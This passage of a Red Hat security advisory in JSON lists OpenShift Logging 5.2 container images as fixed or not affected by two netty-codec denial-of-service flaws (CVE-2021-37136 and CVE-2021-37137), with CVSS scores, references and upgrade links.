"text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). 
The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37136" }, { "category": "external", "summary": "RHBZ#2004133", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004133" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37136", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37136" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:38:45+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata 
update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5127" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data" }, { "cve": "CVE-2021-37137", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004135" } ], "notes": [ { "category": "description", "text": "A flaw was found in the 
Netty\u0027s netty-codec due to unrestricted chunk lengths in the SnappyFrameDecoder. By sending a specially-crafted input, a remote attacker could cause excessive memory usage resulting in a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] }, 
"references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-37137" }, { "category": "external", "summary": "RHBZ#2004135", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004135" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-37137", "url": "https://www.cve.org/CVERecord?id=CVE-2021-37137" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "category": "external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" } ], "release_date": "2021-09-09T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:38:45+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5127" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", 